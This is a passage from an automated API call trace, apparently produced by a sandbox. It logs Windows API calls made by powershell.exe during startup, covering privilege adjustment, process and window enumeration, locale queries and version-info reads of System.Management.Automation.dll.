DisableAllPrivileges=0, NewState=0x2bca980*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0130.794] CloseHandle (hObject=0x2ec) returned 1 [0130.807] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbf8) returned 0x2ec [0130.822] EnumProcessModules (in: hProcess=0x2ec, lphModule=0x2bca9e8, cb=0x200, lpcbNeeded=0xcdb68 | out: lphModule=0x2bca9e8, lpcbNeeded=0xcdb68) returned 1 [0130.825] GetModuleInformation (in: hProcess=0x2ec, hModule=0x13f120000, lpmodinfo=0x2bcac58, cb=0x18 | out: lpmodinfo=0x2bcac58*(lpBaseOfDll=0x13f120000, SizeOfImage=0x77000, EntryPoint=0x13f12c63c)) returned 1 [0130.826] CoTaskMemAlloc (cb=0x804) returned 0x1b5340 [0130.826] GetModuleBaseNameW (in: hProcess=0x2ec, hModule=0x13f120000, lpBaseName=0x1b5340, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0130.826] CoTaskMemFree (pv=0x1b5340) [0130.829] CoTaskMemAlloc (cb=0x804) returned 0x1b5340 [0130.829] GetModuleFileNameExW (in: hProcess=0x2ec, hModule=0x13f120000, lpFilename=0x1b5340, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0130.829] CoTaskMemFree (pv=0x1b5340) [0130.830] CloseHandle (hObject=0x2ec) returned 1 [0130.843] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xbf8) returned 0x2ec [0130.844] GetExitCodeProcess (in: hProcess=0x2ec, lpExitCode=0xcdc98 | out: lpExitCode=0xcdc98*=0x103) returned 1 [0130.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12bcb088, Length=0x20000, ResultLength=0xcdc60 | out: SystemInformation=0x12bcb088, ResultLength=0xcdc60*=0xd718) returned 0x0 [0130.865] EnumWindows (lpEnumFunc=0x28d66ac, lParam=0x0) returned 1 [0130.866] GetWindowThreadProcessId (in: hWnd=0x2013e, 
lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x790 [0130.866] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x760 [0130.866] GetWindowThreadProcessId (in: hWnd=0x1009c, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.866] GetWindowThreadProcessId (in: hWnd=0x1009a, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.866] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.866] GetWindowThreadProcessId (in: hWnd=0x100b2, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.866] GetWindowThreadProcessId (in: hWnd=0x200a6, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.866] GetWindowThreadProcessId (in: hWnd=0x100a2, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.867] GetWindowThreadProcessId (in: hWnd=0x1009e, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.867] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.867] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.867] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x684 [0130.867] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.867] GetWindowThreadProcessId (in: hWnd=0x100f4, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.867] GetWindowThreadProcessId (in: hWnd=0x100cc, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.867] GetWindowThreadProcessId (in: hWnd=0x500bc, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.867] GetWindowThreadProcessId (in: hWnd=0x100b4, lpdwProcessId=0xcd9c0 | out: 
lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.867] GetWindowThreadProcessId (in: hWnd=0x100c4, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.868] GetWindowThreadProcessId (in: hWnd=0x201e6, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x9b0 [0130.868] GetWindowThreadProcessId (in: hWnd=0x10282, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0xa84 [0130.868] GetWindowThreadProcessId (in: hWnd=0x20222, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x9b0 [0130.868] GetWindowThreadProcessId (in: hWnd=0x3020e, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x9b0 [0130.868] GetWindowThreadProcessId (in: hWnd=0x101ba, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x9b0 [0130.868] GetWindowThreadProcessId (in: hWnd=0x101b8, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x9cc [0130.868] GetWindowThreadProcessId (in: hWnd=0x201b0, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x9b0 [0130.868] GetWindowThreadProcessId (in: hWnd=0x201aa, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x9b0 [0130.868] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x118 [0130.868] GetWindowThreadProcessId (in: hWnd=0x3020c, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x9b0 [0130.868] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x9b0 [0130.868] GetWindowThreadProcessId (in: hWnd=0x101dc, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x9b0 [0130.868] GetWindowThreadProcessId (in: hWnd=0x301ac, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x8a0 [0130.868] GetWindowThreadProcessId (in: hWnd=0x5019c, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x678 [0130.868] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x558 
[0130.869] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6f8 [0130.869] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x70c [0130.869] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x600 [0130.869] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x644 [0130.869] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x544 [0130.869] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x32c [0130.869] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x4bc [0130.869] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x504 [0130.869] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x448 [0130.869] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x484 [0130.869] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x758 [0130.869] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x1c4 [0130.869] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x7cc [0130.869] GetWindowThreadProcessId (in: hWnd=0x2015c, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x7d4 [0130.869] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6e8 [0130.869] GetWindowThreadProcessId (in: hWnd=0x30116, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6a0 [0130.870] GetWindowThreadProcessId (in: 
hWnd=0x4012c, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x678 [0130.870] GetWindowThreadProcessId (in: hWnd=0x30126, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x678 [0130.870] GetWindowThreadProcessId (in: hWnd=0x30152, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x730 [0130.870] GetWindowThreadProcessId (in: hWnd=0x10148, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x790 [0130.870] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x788 [0130.870] GetWindowThreadProcessId (in: hWnd=0x60074, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x790 [0130.870] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x788 [0130.870] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x790 [0130.870] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x730 [0130.870] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x730 [0130.870] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x784 [0130.870] GetWindowThreadProcessId (in: hWnd=0x1011e, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x684 [0130.870] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x778 [0130.870] GetWindowThreadProcessId (in: hWnd=0x10100, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.870] GetWindowThreadProcessId (in: hWnd=0x100fc, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.871] GetWindowThreadProcessId (in: hWnd=0x100ee, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.871] GetWindowThreadProcessId (in: hWnd=0x100e4, lpdwProcessId=0xcd9c0 | out: 
lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.871] GetWindowThreadProcessId (in: hWnd=0x100de, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.871] GetWindowThreadProcessId (in: hWnd=0x200d8, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.871] GetWindowThreadProcessId (in: hWnd=0x100c0, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.871] GetWindowThreadProcessId (in: hWnd=0x500b6, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.871] GetWindowThreadProcessId (in: hWnd=0x100ac, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x740 [0130.871] GetWindowThreadProcessId (in: hWnd=0x100aa, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.871] GetWindowThreadProcessId (in: hWnd=0x100a0, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.871] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.871] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.871] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6d8 [0130.871] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x708 [0130.871] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x664 [0130.871] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.871] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x684 [0130.872] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x684 [0130.872] GetWindowThreadProcessId (in: hWnd=0x30040, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x62c 
[0130.872] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x674 [0130.872] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6f0 [0130.872] GetWindowThreadProcessId (in: hWnd=0x3021e, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0xbe4 [0130.872] GetWindowThreadProcessId (in: hWnd=0x2007a, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x684 [0130.872] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x760 [0130.872] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.872] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.872] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x9b0 [0130.872] GetWindowThreadProcessId (in: hWnd=0x201a4, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x9b0 [0130.872] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x118 [0130.872] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x558 [0130.872] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6f8 [0130.872] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x70c [0130.873] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x600 [0130.873] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x644 [0130.873] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x544 [0130.873] GetWindowThreadProcessId (in: 
hWnd=0x1017e, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x32c [0130.873] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x4bc [0130.873] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x504 [0130.873] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x448 [0130.873] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x484 [0130.873] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x758 [0130.873] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x1c4 [0130.873] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x7cc [0130.873] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x7d4 [0130.873] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6e8 [0130.873] GetWindowThreadProcessId (in: hWnd=0x20154, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6a0 [0130.873] GetWindowThreadProcessId (in: hWnd=0x2012a, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x678 [0130.873] GetWindowThreadProcessId (in: hWnd=0x10134, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x788 [0130.874] GetWindowThreadProcessId (in: hWnd=0x20024, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x790 [0130.874] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x730 [0130.874] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x684 [0130.874] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0xcd9c0 | out: 
lpdwProcessId=0xcd9c0) returned 0x6d8 [0130.874] GetWindowThreadProcessId (in: hWnd=0x10062, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x708 [0130.874] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x664 [0130.874] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x684 [0130.874] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x62c [0130.874] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6f0 [0130.874] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0xbf4 [0130.882] WerSetFlags () returned 0x0 [0130.906] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0130.906] CoTaskMemFree (pv=0x0) [0130.907] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xcdd28, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcdd20 | out: pulNumLanguages=0xcdd28, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcdd20) returned 1 [0130.907] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xcdd28, pwszLanguagesBuffer=0x2be8988, pcchLanguagesBuffer=0xcdd20 | out: pulNumLanguages=0xcdd28, pwszLanguagesBuffer=0x2be8988, pcchLanguagesBuffer=0xcdd20) returned 1 [0130.962] CoTaskMemAlloc (cb=0x24) returned 0x1a29c0 [0130.962] GetUserDefaultLocaleName (in: lpLocaleName=0x1a29c0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0130.962] CoTaskMemFree (pv=0x1a29c0) [0131.006] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0131.006] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.006] CoTaskMemFree (pv=0x10c990) [0131.015] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0131.015] GetEnvironmentVariableW 
(in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.015] CoTaskMemFree (pv=0x10c990) [0131.036] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0131.036] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.036] CoTaskMemFree (pv=0x10c990) [0131.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0131.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0131.078] SetErrorMode (uMode=0x1) returned 0x1 [0131.078] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcd9a0 | out: lpFileInformation=0xcd9a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0131.078] SetErrorMode (uMode=0x1) returned 0x1 [0131.079] GetFileVersionInfoSizeW 
(in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xcdc10 | out: lpdwHandle=0xcdc10) returned 0x94c [0131.079] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2bec218 | out: lpData=0x2bec218) returned 1 [0131.080] VerQueryValueW (in: pBlock=0x2bec218, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdb88, puLen=0xcdb80 | out: lplpBuffer=0xcdb88*=0x2bec2b4, puLen=0xcdb80) returned 1 [0131.080] VerQueryValueW (in: pBlock=0x2bec218, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcdaf8, puLen=0xcdaf0 | out: lplpBuffer=0xcdaf8*=0x2bec390, puLen=0xcdaf0) returned 1 [0131.080] lstrlenW (lpString="Microsoft Corporation") returned 21 [0131.080] CoTaskMemAlloc (cb=0x2e) returned 0x1b23f0 [0131.080] lstrcpyW (in: lpString1=0x1b23f0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0131.080] CoTaskMemFree (pv=0x1b23f0) [0131.081] VerQueryValueW (in: pBlock=0x2bec218, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcdaf8, puLen=0xcdaf0 | out: lplpBuffer=0xcdaf8*=0x2bec3e4, puLen=0xcdaf0) returned 1 [0131.081] lstrlenW (lpString="System.Management.Automation") returned 28 [0131.081] CoTaskMemAlloc (cb=0x3c) returned 0x1655d0 [0131.081] lstrcpyW (in: lpString1=0x1655d0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0131.081] CoTaskMemFree (pv=0x1655d0) [0131.081] VerQueryValueW (in: pBlock=0x2bec218, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcdaf8, puLen=0xcdaf0 | out: lplpBuffer=0xcdaf8*=0x2bec440, puLen=0xcdaf0) returned 1 [0131.081] lstrlenW (lpString="6.1.7601.17514") returned 14 
[0131.081] CoTaskMemAlloc (cb=0x20) returned 0x1a9ca0 [0131.081] lstrcpyW (in: lpString1=0x1a9ca0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0131.081] CoTaskMemFree (pv=0x1a9ca0) [0131.081] VerQueryValueW (in: pBlock=0x2bec218, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcdaf8, puLen=0xcdaf0 | out: lplpBuffer=0xcdaf8*=0x2bec480, puLen=0xcdaf0) returned 1 [0131.081] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0131.081] CoTaskMemAlloc (cb=0x44) returned 0x1655d0 [0131.081] lstrcpyW (in: lpString1=0x1655d0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0131.081] CoTaskMemFree (pv=0x1655d0) [0131.081] VerQueryValueW (in: pBlock=0x2bec218, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcdaf8, puLen=0xcdaf0 | out: lplpBuffer=0xcdaf8*=0x2bec4e8, puLen=0xcdaf0) returned 1 [0131.081] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0131.081] CoTaskMemAlloc (cb=0x76) returned 0x147840 [0131.081] lstrcpyW (in: lpString1=0x147840, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." 
[0131.081] CoTaskMemFree (pv=0x147840) [0131.081] VerQueryValueW (in: pBlock=0x2bec218, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcdaf8, puLen=0xcdaf0 | out: lplpBuffer=0xcdaf8*=0x2bec584, puLen=0xcdaf0) returned 1 [0131.082] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0131.082] CoTaskMemAlloc (cb=0x44) returned 0x1655d0 [0131.082] lstrcpyW (in: lpString1=0x1655d0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0131.082] CoTaskMemFree (pv=0x1655d0) [0131.082] VerQueryValueW (in: pBlock=0x2bec218, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcdaf8, puLen=0xcdaf0 | out: lplpBuffer=0xcdaf8*=0x2bec5e8, puLen=0xcdaf0) returned 1 [0131.082] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0131.082] CoTaskMemAlloc (cb=0x58) returned 0x10bab0 [0131.082] lstrcpyW (in: lpString1=0x10bab0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0131.082] CoTaskMemFree (pv=0x10bab0) [0131.082] VerQueryValueW (in: pBlock=0x2bec218, 